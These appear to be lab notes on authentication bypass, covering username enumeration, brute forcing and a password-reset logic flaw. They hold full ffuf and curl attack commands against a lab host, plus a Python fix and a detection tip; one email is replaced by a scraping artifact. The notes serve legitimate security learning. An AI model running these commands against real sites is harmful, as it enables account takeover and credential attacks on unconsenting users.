Authentication Bypass

User Enumeration

  • Website error messages are great for collecting information

  • Enter the username admin and fill the other fields with fake information; you'll get an error like "An account with this username already exists", which confirms that the username is valid

  • We can do this with ffuf

    • ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.214.198/customers/signup -mr "username already exists"

Brute Force

  • Use the usernames found from enumeration to brute force

  • ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.214.198/customers/login -fc 200

Logic Flaw

  • A logic flaw is when the typical logical path of an application is either bypassed, circumvented or manipulated

Logic Path

  • Example

    • curl 'http://10.10.214.198/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&[email protected]'

    • This uses the Reset Password feature, but the reset email is delivered to a different address: the target's email is supplied in the URL query string, while the application sends the reset link to the email value we pass in the POST body
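The reset flaw above, as an added example (not the lab's own code): a simulated request object in Python with constructed USERS, Request, reset_vulnerable and reset_fixed names, showing why reading the destination address from the request instead of from the account record lets the POST body override the query string.

```python
"""Constructed demo of the password-reset logic flaw (not the lab's code).

The handler identifies the account from the query-string copy of `email`,
but then reads `email` again through a merged view of query + body, so the
POST body copy silently becomes the destination of the reset link.
"""
from dataclasses import dataclass

# Constructed user store: username -> registered email address.
USERS = {"robert": "robert@acmeitsupport.thm"}


@dataclass
class Request:
    query: dict  # parameters parsed from the URL (?email=...)
    form: dict   # parameters parsed from the POST body

    def param(self, name):
        """Merged lookup in the style of PHP's $_REQUEST: body wins over query."""
        return self.form.get(name, self.query.get(name))


def reset_vulnerable(req: Request):
    """Return the address the reset link would be sent to, or None if no match."""
    username = req.param("username")
    if USERS.get(username) != req.query.get("email"):
        return None
    # Defect: destination comes from the request, so the body copy overrides.
    return req.param("email")


def reset_fixed(req: Request):
    """Same validation, but the destination is always the stored address."""
    username = req.param("username")
    if USERS.get(username) != req.query.get("email"):
        return None
    # Authoritative source: user-supplied copies of `email` are never trusted.
    return USERS[username]


# Constructed request mirroring the curl above: the target's email in the
# query string, a different address (placeholder) in the POST body.
DEMO_REQUEST = Request(
    query={"email": "robert@acmeitsupport.thm"},
    form={"username": "robert", "email": "outsider@example.invalid"},
)

if __name__ == "__main__":
    print("vulnerable sends to:", reset_vulnerable(DEMO_REQUEST))
    print("fixed sends to:     ", reset_fixed(DEMO_REQUEST))
```

Detection tip: log both copies of any parameter that influences where a security token is delivered, and alert when they disagree.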
